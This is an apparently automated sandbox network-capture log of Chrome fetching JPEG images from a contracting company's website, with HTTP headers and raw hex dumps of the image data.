                                              2024-09-27 06:20:08 UTC7869INData Raw: d6 9c 3d 9d 67 43 fb 2e 09 e7 84 80 94 46 9b 63 fa 9d c5 da ca 9d 70 23 b1 ce 71 1e a3 f9 7b 49 12 fb 3c 4a 43 ff 00 23 1f f1 1f f4 82 93 78 ae 32 07 6c 7d 9a c7 fa 87 d5 21 e5 2e bf f9 6e 13 21 9a 52 36 4c a3 64 f3 c3 8f fe 5c 32 96 3c f8 e7 02 63 21 03 a8 f7 bd bd b4 fd 06 39 3f 88 b1 e6 16 35 1e c6 21 38 e5 06 b5 1a c4 82 1e a3 d0 5e 0f 5e e2 4e cd e7 74 3d 97 cc 76 bc 32 cb 0c 32 db c0 32 3e da 0f 07 95 0b 0c 59 b5 63 33 8c 62 ac 52 27 d2 27 f9 72 ef 8e 5d 85 ff 00 d1 3d b8 72 84 cf 47 ba 32 a8 8b f8 a5 a4 07 bb ed 4e 47 ed 4b c5 eb dd 8f 3c 76 4b 89 83 a7 77 9a 46 52 80 9c 8e dc 98 c9 c7 92 60 79 8d 71 5c fc 5a 1d 35 72 ba 32 98 f5 dd 2e df 3e 28 81 01 ac 8d f8 be 7b ed 91 1c f8 ab 20 32 90 16 63 f0 ca c7 b1 f1 48 31 34 45 1f 02 fb b2 2d 35 e2 f5 47
                                              Data Ascii: =gC.Fcp#q{I<JC#x2l}!.n!R6Ld\2<c!9?5!8^^Nt=v222>Yc3bR''r]=rG2NGK<vKwFR`yq\Z5r2.>({ 2cH14E-5G


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              65192.168.2.465400173.231.215.1184436228C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-27 06:20:08 UTC734OUTGET /uploads/certifications/3/b28c762ff89177dacd4852c7b909ca34.jpg HTTP/1.1
                                              Host: www.citydiamondcontracting.com
                                              Connection: keep-alive
                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                              sec-ch-ua-mobile: ?0
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              sec-ch-ua-platform: "Windows"
                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                              Sec-Fetch-Site: same-origin
                                              Sec-Fetch-Mode: no-cors
                                              Sec-Fetch-Dest: image
                                              Referer: https://www.citydiamondcontracting.com/certifications
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
                                              2024-09-27 06:20:08 UTC261INHTTP/1.1 200 OK
                                              Date: Fri, 27 Sep 2024 06:20:08 GMT
                                              Server: Apache
                                              Content-Security-Policy: upgrade-insecure-requests;
                                              Last-Modified: Fri, 13 Jan 2023 06:39:13 GMT
                                              Accept-Ranges: bytes
                                              Content-Length: 45790
                                              Connection: close
                                              Content-Type: image/jpeg
                                              2024-09-27 06:20:08 UTC7931INData Raw: ff d8 ff e1 00 18 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 00 00 00 00 00 00 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 0a 00 00 ff e1 03 2f 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 39 2e 30 2d 63 30 30 30 20 37 39 2e 31 37 31 63 32 37 66 61 62 2c 20 32 30 32 32 2f 30 38 2f 31 36 2d 32 32 3a 33 35 3a 34 31 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66 3a 52 44 46
                                              Data Ascii: ExifII*Ducky/http://ns.adobe.com/xap/1.0/<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.0-c000 79.171c27fab, 2022/08/16-22:35:41 "> <rdf:RDF
                                              2024-09-27 06:20:08 UTC8000INData Raw: 56 29 4f 19 ec 25 47 f2 a3 ed a4 0f bb dc 2a ef 45 04 1e 1f 83 c5 ff 00 aa 09 7f e3 47 fd 20 ee 7f 03 84 3f 0e 8f 5f d3 ce 70 cd 18 0c a6 a5 a1 d3 5f 77 b1 03 ed 90 48 1a 9e 1f 37 f0 2e ba 7d 77 47 0c b9 3e 3d 63 23 e2 63 df e6 f8 5d 78 9f e3 1f 8a 9e 86 72 31 c1 8c 6b 18 f7 a0 09 f9 eb 5e c0 81 f5 d1 9c 66 2e 24 11 ec 59 4e 31 f8 88 1e f7 c2 8f e0 b8 7f 08 32 eb 7a 63 20 21 09 99 63 26 c4 b4 d1 f2 ff 00 07 fc 1e 1f 8c e3 9f 59 d7 4a 53 9c a4 62 2a 55 55 fb e8 38 01 03 ec ad 41 07 87 e3 7f 0c cf 97 14 3a df c3 b2 48 ce 38 b1 e4 d8 4f b2 c7 df a1 ae cf 1f fe 5b fd 54 ff 00 0d c9 8b 26 43 ff 00 83 f5 37 02 7c 25 13 56 7f 7e 0f b1 03 ef b7 0f 10 8d f1 f1 0f c7 7f e5 bf f8 6e 2f c4 3a 6c d8 73 de d8 e6 dd e5 35 ae da 79 bf 0d fc 1f a7 ea ba fe a3 a5 c9 bb d3
                                              Data Ascii: V)O%G*EG ?_p_wH7.}wG>=c#c]xr1k^f.$YN12zc !c&YJSb*UU8A:H8O[T&C7|%V~n/:ls5y
                                              2024-09-27 06:20:08 UTC8000INData Raw: aa 80 aa aa 02 aa a8 0a aa a0 2a aa 80 aa aa 02 aa a8 0a aa a0 2e 19 63 46 fc 5d d9 9c 77 0a 40 c2 12 da 6d 33 1b 4d 8f 7b 0e 91 f3 c7 6f 70 e8 80 98 d6 c7 75 c6 68 d7 62 b1 f3 0d bd fb 31 c6 ac 01 22 8d 3c 9f 8b 75 e7 f0 fe 8e 59 e3 f1 01 b6 1f d4 78 fa 39 7b 72 73 7e 2f 8d ff 00 97 4e 29 4b f0 fb 8e bb 25 19 91 ec fd ca 29 87 a9 3f c1 ff 00 0d 39 f2 48 e4 cf 3d a4 99 92 7c d2 e0 7b a3 f7 97 1f d9 3f 12 1d 1f ed ff 00 b5 4f d5 db ea fa 7f 67 6f 35 e1 c7 b2 bb 3e 8f e2 1d 2f fd 6f d0 6d c2 41 32 8c 32 43 da 47 6f ac 3e 4c ff 00 1b cf 1e 8c 7e 1d 2c 33 8f 53 28 fa 22 c5 02 38 b1 ed af 95 f7 60 3d 18 7f e5 c5 03 d2 61 cf 9a 24 cb 24 bd 33 b3 8d c3 df db bb dd ff 00 59 e3 c3 d6 47 a0 31 91 9c c6 e1 21 f0 f7 f9 f6 7e 7b f1 0f c2 33 f4 9f 87 f4 f1 8c 4c e5 8f
                                              Data Ascii: *.cF]w@m3M{opuhb1"<uYx9{rs~/N)K%)?9H=|{?Ogo5>/omA22CGo>L~,3S("8`=a$$3YG1!~{3L
                                              2024-09-27 06:20:08 UTC8000INData Raw: 55 55 01 55 54 05 55 50 15 55 40 51 76 97 9f a4 9f a9 8f 7f 89 97 d6 81 d0 aa a8 0a aa a0 2a aa 80 aa aa 02 aa a8 0a aa a0 2a aa 80 aa aa 02 aa a8 0a ab 12 91 ba 1c a0 5a b0 23 ed 29 89 b4 09 c9 1b 1a 38 70 f5 bc f9 23 b4 fb 1a 80 4f f3 05 fd a4 43 cc 0c 4f c9 80 48 36 1d 25 e6 1b a3 f3 44 33 22 b4 74 1e 68 d7 70 a7 f9 83 4e 58 07 69 b4 03 8c f9 83 53 1a 7b 8a c8 54 81 1c 14 91 66 41 14 bc 62 a2 13 29 88 f2 b2 90 84 4c a4 68 01 64 fb 9f 27 a6 ea ba 9f c4 31 4b a9 c4 46 3c 72 bf 46 26 36 4d 7d a9 7b cf 61 db bb 01 e9 9c de 01 9f 58 f8 3c 9f b7 61 13 8e 19 93 ea 13 b2 46 02 e3 bf 6e e2 3e 8f a3 bb cb 2f c6 7a 7f 4a 59 b1 6e c8 23 5a 08 11 66 46 a2 35 f1 2d 07 ae 33 0e e1 b1 20 78 7c 3c df 89 8c 1e b6 49 59 8e 18 c3 76 31 12 08 c9 2e db bb 8f a9 70 75 b9 23
                                              Data Ascii: UUUTUPU@Qv**Z#)8p#OCOH6%D3"thpNXiS{TfAb)Lhd'1KF<rF&6M}{aX<aFn>/zJYn#ZfF5-3 x|<IYv1.pu#
                                              2024-09-27 06:20:08 UTC8000INData Raw: 93 e0 c4 7a ec 12 8e e1 31 40 4a 47 d8 23 cf d0 e5 1f c3 f6 e0 9e 21 2a 94 cd 99 c4 57 87 e5 e2 f3 8f c1 c8 89 8c 72 90 65 bf 71 11 1c 4e b4 1e 1c 73 aa 07 54 ff 00 11 c2 32 fa 31 37 2d 6f c0 51 03 f5 ed df 46 b1 fe 21 87 26 11 d4 6e ac 67 4b 96 9d e9 c0 7e 19 53 89 de 76 40 99 42 14 34 b9 09 1d 7b ea 1a fd 84 7a 71 c2 32 79 e1 2f 52 12 a1 63 53 56 3b 8d 48 ff 00 34 0d 47 e2 1d 39 94 62 32 0b 9d 18 fc f8 fa 6a bd fa 37 93 ab c3 8f 20 c5 39 81 33 d9 e5 8f e1 f0 c6 0e e9 9b 99 81 24 d6 b2 8c 8c be f2 78 4e 7f c3 e3 d4 4a 52 13 22 19 2b d4 88 a3 66 3c 6b db db ee ec 81 a4 ff 00 11 c3 1c 51 ce 0e ec 72 90 8e e1 ed ee d8 eb b0 1d b5 31 e7 17 1f df b7 cf be 9c b3 93 a3 df 86 18 84 88 38 cc 08 95 7f 0f b1 e6 1f 83 c7 78 99 95 92 41 c9 71 1e 62 0e eb 1e 1a 9f 6f
                                              Data Ascii: z1@JG#!*WreqNsT217-oQF!&ngK~Sv@B4{zq2y/RcSV;H4G9b2j7 93$xNJR"+f<kQr18xAqbo
                                              2024-09-27 06:20:08 UTC5859INData Raw: 5f 72 bf 20 3a 71 11 bf 16 e1 c5 6c 24 1d 78 e3 bb d7 0e b3 ad e9 af cf bc 44 ed 23 26 ba f8 6e 1a fd 6c 79 7d 19 79 ad cf a4 57 ca e9 7f 1a c5 90 88 66 1e 94 cf 1b b5 89 f7 4b f3 a7 d4 79 b4 d6 a6 d3 9d 02 af 1f e2 31 c9 2c 3f ca 04 c8 4a 12 a8 f3 42 42 fe e7 83 ae c5 d5 75 19 7d 5c 11 9c 23 2c 7e 91 12 35 5b 89 b9 55 f3 11 a8 61 4f 6d 5f 03 1f 4d d4 c3 2e 19 6d 99 31 8e 30 77 4b 40 00 f3 79 81 d0 f8 c4 89 6e f1 7a ba 8c 19 25 d4 99 4a 13 9c 4f a7 e8 98 4f 68 85 7c 57 a8 f7 f0 6c 68 81 ea ab e4 42 5f 88 c8 91 23 5e 78 8b 11 1a 47 71 b3 1f 11 b6 b9 ee f3 e5 e9 7a c9 e3 9e 3f 39 3f cc 1b b4 b2 0e 48 91 47 c0 c2 fe a4 0f 7e d5 f2 31 8e ab 14 c4 04 64 31 ee 9d 6d 11 d7 cf a6 ed dc 47 6f 83 9c 7f 6f c8 41 c8 26 22 32 44 d0 11 bd b5 20 41 f1 00 d7 d6 81 ed a6
                                              Data Ascii: _r :ql$xD#&nly}yWfKy1,?JBBu}\#,~5[UaOm_M.m10wK@ynz%JOOh|WlhB_#^xGqz?9?HG~1d1mGooA&"2D A


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              66192.168.2.465402173.231.215.1184436228C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-27 06:20:08 UTC469OUTGET /uploads/certifications/1/c3477d31049b9b96e47ca0d2bf05bcdb.jpg HTTP/1.1
                                              Host: www.citydiamondcontracting.com
                                              Connection: keep-alive
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              Accept: */*
                                              Sec-Fetch-Site: none
                                              Sec-Fetch-Mode: cors
                                              Sec-Fetch-Dest: empty
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
                                              2024-09-27 06:20:08 UTC261INHTTP/1.1 200 OK
                                              Date: Fri, 27 Sep 2024 06:20:08 GMT
                                              Server: Apache
                                              Content-Security-Policy: upgrade-insecure-requests;
                                              Last-Modified: Fri, 13 Jan 2023 06:38:52 GMT
                                              Accept-Ranges: bytes
                                              Content-Length: 45980
                                              Connection: close
                                              Content-Type: image/jpeg
                                              2024-09-27 06:20:08 UTC7931INData Raw: ff d8 ff e1 00 18 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 00 00 00 00 00 00 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 0a 00 00 ff e1 03 2f 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 39 2e 30 2d 63 30 30 30 20 37 39 2e 31 37 31 63 32 37 66 61 62 2c 20 32 30 32 32 2f 30 38 2f 31 36 2d 32 32 3a 33 35 3a 34 31 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66 3a 52 44 46
                                              Data Ascii: ExifII*Ducky/http://ns.adobe.com/xap/1.0/<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.0-c000 79.171c27fab, 2022/08/16-22:35:41 "> <rdf:RDF
                                              2024-09-27 06:20:08 UTC8000INData Raw: cb 7f f0 dc 5f 88 74 d9 b0 e7 bd b1 cd bb ca 6b 5d b4 f3 7e 1b f8 3f 4f d5 75 fd 47 4b 93 77 a7 8a f6 d4 b5 e6 b5 40 fb bd c3 c5 41 be 1f 86 fc 63 a7 e9 f1 fe 25 8b 06 72 63 d3 c3 14 20 65 7a ed 02 55 af d0 ed f8 0c 44 3f 12 94 7a 19 4e 5d 20 07 71 95 d7 1a 7f ce e3 bd 20 7d 99 20 72 97 e2 ff 00 f2 e3 13 fc 4b ac 3d 36 2d 47 4f 8a 59 25 ef e4 fd d4 1e f8 7e 31 21 f8 30 ea 60 7f 9b 10 31 5f 84 af 6d fd 1a a0 7d 19 c9 10 76 92 01 f0 b4 99 01 c9 7e 4b f0 bf fc b6 f0 75 bd 34 7a 9e aa 53 96 5c a3 76 ed dc 78 7b cf 7d 5d 3f 13 ff 00 cb 7f 0e 1e 92 79 e7 29 4f 2e 2c 74 25 74 0e de 2c 7f 9a 07 d4 6e 1e 21 77 0f 10 fc a7 fe 5b df 82 74 dd 46 08 75 73 dd ea 5c c6 92 d3 bc 7e a7 93 f0 af c3 30 1f c5 72 e0 20 ec c2 77 63 f3 77 89 8d 7b d0 3e de c5 d5 ea b6 38 ee fe
                                              Data Ascii: _tk]~?OuGKw@Ac%rc ezUD?zN] q } rK=6-GOY%~1!0`1_m}v~Ku4zS\vx{}]?y)O.,t%t,n!w[tFus\~0r wcw{>8
                                              2024-09-27 06:20:08 UTC8000INData Raw: 90 e9 71 66 ea 4f 55 2e aa 10 03 70 af 87 e9 f1 fd 1e 3f c6 61 38 fe 23 87 37 a3 2c b8 e1 11 ba 31 8e eb e7 4f 07 5c f9 e3 d5 74 5d 4e 3c 3d 34 f0 9d a3 43 0a dd af b0 6b 48 a6 bf fa f3 74 d7 0b 86 41 09 fd b2 34 1f 9d 77 a7 d2 e9 ff 00 14 c7 93 aa 9f 42 63 28 e4 c7 1b b9 55 48 69 c7 d2 fc f7 e2 3d 36 59 7e 15 d2 40 42 46 51 22 e2 22 6c 73 d9 e9 ff 00 cb 83 a6 cf 83 36 2e b3 a5 89 94 cc 25 8a 62 31 27 b7 b3 d8 4f d0 10 0f 5b f8 b6 0e b3 a3 c9 90 7a b8 f1 c2 71 86 fc 75 ba 47 5e 35 e3 c7 e4 fa 19 3f 1d e9 fa 03 8b a7 c8 26 77 63 8c c4 ea fb 69 7d f7 1a ec f9 3d 6f e1 d3 c1 f8 2c 7a 7c 71 32 c9 70 9c a3 11 66 cf 3f 47 0e f2 e9 f2 ff 00 d6 7d 1c f6 4b 6c 70 c4 4a 5b 4d 03 52 e4 f6 60 3b b3 ff 00 e5 c3 80 63 c6 44 32 4b 26 5d 61 88 0f 3e 86 b5 6b a4 fc 77 06
                                              Data Ascii: qfOU.p?a8#7,1O\t]N<=4CkHtA4wBc(UHi=6Y~@BFQ""ls6.%b1'O[zquG^5?&wci}=o,z|q2pf?G}KlpJ[MR`;cD2K&]a>kw
                                              2024-09-27 06:20:08 UTC8000INData Raw: 6e 5c ce 20 78 d1 ce 13 31 f7 3b c6 62 5c 20 4c 71 80 d9 34 c4 b2 08 fb 4b 91 26 66 90 2e 59 7f 85 98 c0 cb 53 c3 70 c5 5a 9e 5d 50 26 31 11 d0 34 aa c0 2a aa 80 bc f9 3e 22 f4 3c f9 47 99 a8 0e 3d 2e 5e 01 65 a0 11 f9 96 a0 3c be f2 e7 23 64 94 00 05 9a 6f 21 af 28 e0 26 1e 51 b8 fc 9c d1 0a 80 b2 13 3c 86 5c 70 b1 d2 26 5e 3a 22 31 dc 69 01 84 6f 53 c2 77 6f 90 03 85 9c be c8 e0 27 08 d6 d0 37 55 56 14 55 50 50 0b 12 1d d4 8b d4 15 a3 e3 f4 a0 3b 88 e5 b6 40 d3 56 90 15 55 40 55 55 01 55 54 05 55 50 15 55 40 55 55 01 45 da 5e 7e 92 7e a6 3d fe 26 5f 5a 07 42 aa a0 2a aa 80 aa aa 02 aa a8 0a aa a0 2a aa 80 aa aa 02 aa a8 03 86 62 0d 36 a8 12 74 1a 24 30 0d 9b 6a cf 64 0a 54 03 69 40 cf 24 6c 68 e1 c3 d6 f3 e4 8e d3 ec 6a 01 3f cc 17 f6 91 0f 30 31 3f 26
                                              Data Ascii: n\ x1;b\ Lq4K&f.YSpZ]P&14*>"<G=.^e<#do!(&Q<\p&^:"1ioSwo'7UVUPP;@VU@UUUTUPU@UUE^~~=&_ZB**b6t$0jdTi@$lhj?01?&
                                              2024-09-27 06:20:08 UTC8000INData Raw: e8 46 39 c6 73 c8 65 30 45 13 43 48 89 00 34 fe a2 4a 06 b3 eb 70 c2 52 8c a6 01 86 b2 d0 e9 df 53 c7 1d b9 5c bd 77 4f 84 91 39 d1 b2 0e 87 b0 04 fd 00 87 2c ff 00 86 47 3e 49 4e 52 20 48 18 d0 a1 c8 ae 7b 8e e0 1b a2 b8 ba 28 47 21 39 27 be 72 12 dc 0d 6a 24 22 38 1d bc a8 1b 64 eb b0 62 24 4e 40 10 68 fb 38 3f 46 a2 cf 01 c8 fe 23 01 93 65 69 75 b8 1d 3e d7 fd 97 09 fe 13 8a 30 80 94 cf 96 e2 67 3d a7 70 99 f6 e9 7c 00 5a 3f 87 e2 91 b1 90 8d e4 98 ed 23 fc 47 4f f9 47 e8 40 da 5f 8a 74 d1 1b 8c eb 52 38 37 a0 be 2a f8 d7 dc d9 fc 43 a7 12 31 33 16 06 e3 f5 f3 c7 07 8e 5e 7c 5f 84 c7 1d 9d e6 ce ee 00 03 58 88 fe 97 ef 53 f8 4c 4c 65 88 ce 5e 9c b9 86 9f 16 9a f1 ec ba e2 d0 3a e3 d5 e2 96 33 94 4b ca 34 3a 1d 0f 85 73 7e c6 07 e2 1d 39 1b b7 8a 00 c8
                                              Data Ascii: F9se0ECH4JpRS\wO9,G>INR H{(G!9'rj$"8db$N@h8?F#eiu>0g=p|Z?#GOG@_tR87*C13^|_XSLLe^:3K4:s~9
                                              2024-09-27 06:20:08 UTC6049INData Raw: fd 2f 09 8f a7 71 3e 94 4d 9d bd cf b3 c4 bd 1e 96 69 0f 2e 4a 04 71 b6 9b 00 dc 75 18 8f 13 8f d2 ea 0d ea 35 0f 06 5c 79 21 cc e3 b7 fc 51 fd e9 98 62 32 90 a8 c6 ae b7 e3 95 1a f1 d3 f2 40 f4 6d 6d f3 f1 75 73 32 31 8f 98 03 40 4f cb 23 ee 3c 7d 23 e6 f5 e3 cd 1c 97 5a 11 cc 4e 84 7e ff 00 43 01 ad ad a1 50 0d ab cb d5 f5 b8 ba 40 0e 59 6a 7e 18 8d 64 7d c1 f2 72 7e 2d d4 e7 fe c4 46 38 dd 6e 97 9a 5f f6 47 de e9 55 bd 08 ec 96 a7 d0 39 cf 3e 38 7c 53 88 f7 c8 07 e5 f3 c3 34 e1 ea 66 c9 29 8d c6 35 b8 f3 ee 14 19 97 4b 83 18 27 4b ab 8e 83 5d 7e af bf 47 7e df 69 8e 7d 87 d3 1e bf a6 1f ef 61 ff 00 2c 35 1e af 04 be 1c 90 3f ea 0f cb c6 1d 3e d0 49 1b bb 8f 9f e5 f7 af a1 86 44 03 b4 8b 02 55 5f 73 7d b5 d7 e8 4e 7d 87 d7 02 08 b1 af b9 5f 90 1d 38 88
                                              Data Ascii: /q>Mi.Jqu5\y!Qb2@mmus21@O#<}#ZN~CP@Yj~d}r~-F8n_GU9>8|S4f)5K'K]~G~i}a,5?>IDU_s}N}_8


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              67192.168.2.465403173.231.215.1184436228C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-27 06:20:10 UTC758OUTGET /images/bg/14.jpg HTTP/1.1
                                              Host: www.citydiamondcontracting.com
                                              Connection: keep-alive
                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                              sec-ch-ua-mobile: ?0
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              sec-ch-ua-platform: "Windows"
                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                              Sec-Fetch-Site: same-origin
                                              Sec-Fetch-Mode: no-cors
                                              Sec-Fetch-Dest: image
                                              Referer: https://www.citydiamondcontracting.com/certifications
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
                                              Range: bytes=135930-165417
                                              If-Range: Fri, 30 Dec 2022 22:22:48 GMT
                                              2024-09-27 06:20:10 UTC317INHTTP/1.1 206 Partial Content
                                              Date: Fri, 27 Sep 2024 06:20:10 GMT
                                              Server: Apache
                                              Content-Security-Policy: upgrade-insecure-requests;
                                              Last-Modified: Fri, 30 Dec 2022 22:22:48 GMT
                                              Accept-Ranges: bytes
                                              Content-Length: 29488
                                              Content-Range: bytes 135930-165417/165418
                                              Connection: close
                                              Content-Type: image/jpeg
                                              2024-09-27 06:20:10 UTC7875INData Raw: 34 ac ea 72 f0 fb 4b 95 e1 e2 d2 f5 ae a8 c7 b7 43 70 1c d6 f9 cd cf 4e 18 e3 2f 44 ca d6 f2 9e 69 64 f8 ae cd 77 57 d3 52 5c 1f 4a 3b 32 94 52 d5 cb 44 b7 ed 29 db ce 39 6d 6d a7 74 65 35 f5 56 f0 2b d5 cb 6b a3 c5 f0 be 64 96 f7 29 f1 7d 0c b1 0c aa aa 7a 3a 1d 6f ee c7 f9 8d 1f c5 ef b1 69 8d 87 6c 97 44 f4 5c 24 70 f3 eb d6 8e 74 d3 09 75 27 c6 05 b8 f3 2c 56 f4 93 75 f6 d8 b8 57 d2 2e e6 98 34 c7 59 5d 19 76 41 f1 3f a0 a9 2e 43 5d fa 7c 66 45 b9 1a 6f 84 9f 84 b5 47 2a e5 d8 fa 3a b1 e1 16 b7 34 b6 81 5d f3 95 63 e1 c4 a2 76 bf bc 9c 17 d2 4f 17 3a c8 d9 c3 1c 4e dd 54 ce 96 8d 6e d0 6d f4 76 81 cd fe 15 6d ad 3c cc 99 5b d6 a3 e0 f6 16 28 e5 b8 74 ed 85 7c 5d b3 f1 7b 4d b7 64 e3 e3 ae 2b 6c 55 ae d6 53 b3 9d e2 6b a6 3a 96 4c be cd 6b f9 c0 e8 25
                                              Data Ascii: 4rKCpN/DidwWR\J;2RD)9mmte5V+kd)}z:oilD\$ptu',VuW.4Y]vA?.C]|fEoG*:4]cvO:NTnmvm<[(t|]{Md+lUSk:Lk%
                                              2024-09-27 06:20:10 UTC8000INData Raw: d9 e1 5d 1d 1b 91 2b 6e bd 27 99 97 cd 99 79 ae 55 f2 6e 5f 76 46 dd 23 93 24 95 5d fb 76 9b 61 ca be 60 cf 92 97 33 cc 54 56 d6 be 5e 2e b1 6b b1 b6 07 5f 27 9a 60 62 a7 e7 5f 14 d7 d4 4d 39 7a 8e 5c be 64 bb 2a 6a ae 55 85 66 44 be d5 a9 d7 0f 5b 2d e2 fc bf cb 31 d7 13 ab ce b7 5f d5 b7 c5 2f 59 d2 51 51 4a 31 5a 25 b9 2d c0 70 63 cb fe 60 ce 52 79 99 31 c4 ae 5b e8 ae 2a 7a af c4 5a c1 f9 6f 94 e1 4f cc ae 95 2b 65 ef 4e 5e 2d 5f 73 3a bd e1 ec ef 60 44 61 08 2d 21 15 15 d5 15 a1 3e 93 0b 6f a6 88 3b 2d 9a 84 63 bd b6 71 ee f9 ab 09 cb cb e5 f0 9f 30 bb 77 05 2b 77 7b 60 76 f4 f5 75 1a 6f cc c5 c6 db 91 74 2a ec 93 4b da 71 74 f9 9f 98 c7 56 eb c0 a2 5f 55 a6 ed 4b bd 6c 37 e3 fc b3 83 09 79 99 93 9e 6c fa 5d ef 89 7a 00 c6 ef 99 e9 94 bc 9e 5f 8f 66
                                              Data Ascii: ]+n'yUn_vF#$]va`3TV^.k_'`b_M9z\d*jUfD[-1_/YQQJ1Z%-pc`Ry1[*zZoO+eN^-_s:`Da-!>o;-cq0w+w{`vuot*KqtV_UKl7yl]z_f
                                              2024-09-27 06:20:10 UTC8000INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 00 12 08 00 48 20 01 20 80 00 03 17 38 af 79 a8 f7 b4 06 4d ed 23 57 af 46 85 3c 9e 71 cb 31 36 df 93 08 ae fd 7d 87 36 ef 9c f9 24 76 63 ce 59 13 fb 10 8b fe 54 07 7f 5d 02 6d f7 1e 6b fe e5 e6 d9 0b f6 2e 4f 73 4f 75 93 71 48 88 2f 9d b2 d3 d6 78 f8 71 7d 12 8b 94 be 80 3d 36 dd e5 7b 73 f0 e8 7f 9f 7d 75 f6 4a 49 7b 4e 0c 7e 58 e6 79 12 d7 98 73
                                              Data Ascii: H 8yM#WF<q16}6$vcYT]mk.OsOuqH/xq}=6{s}uJI{N~Xys
                                              2024-09-27 06:20:10 UTC5613INData Raw: fe e9 cb d5 a9 d5 85 09 7d 59 c7 8a 4b d2 80 ee b6 92 6d ec 5d 65 2b f9 c7 2a c6 4d db 93 5a 7f 67 89 71 3f 41 cf 8f cb 4e ef 16 76 6d f6 cd ef e0 9b 8c 7d 45 da 39 0f 2a a1 7e ef 1b 25 f6 ac 4a 52 f5 b0 2a 4f e6 7a 6c 4d 62 62 df 74 be ac 95 6f 87 d6 43 c9 f9 9f 2a 3f 91 8f 4e 3d 72 fa f2 93 e3 fe a9 db 85 70 ae 3c 15 c5 42 2b 72 4b 43 2d 00 e1 7f 02 e6 17 c7 f6 ce 65 64 d3 df 5a 49 45 7a 51 be 8f 96 b9 45 0d 4f c8 f3 2d e9 9c 9b 6f da 75 b4 00 6b 85 35 56 94 61 08 c5 2d da 24 8d 83 d0 00 02 35 f4 0d 75 dc 06 44 0d 7f e2 68 bf 37 16 88 b9 db 6c 62 97 6a 60 6f 21 ef de 72 27 f3 2e 0c 9f 06 22 96 55 bf 66 31 6b e9 68 c5 e7 73 ec 96 a3 46 1f c2 af b7 6b 52 f4 e8 80 ed 15 ef cd c3 c7 7a 5f 7c 2b 7d 52 69 1c df e0 fc cf 25 eb cc 33 5b 8f 55 1a d6 6c 8f cb bc
                                              Data Ascii: }YKm]e+*MZgq?ANvm}E9*~%JR*OzlMbbtoC*?N=rp<B+rKC-edZIEzQEO-ouk5Va-$5uDh7lbj`o!r'."Uf1khsFkRz_|+}Ri%3[Ul


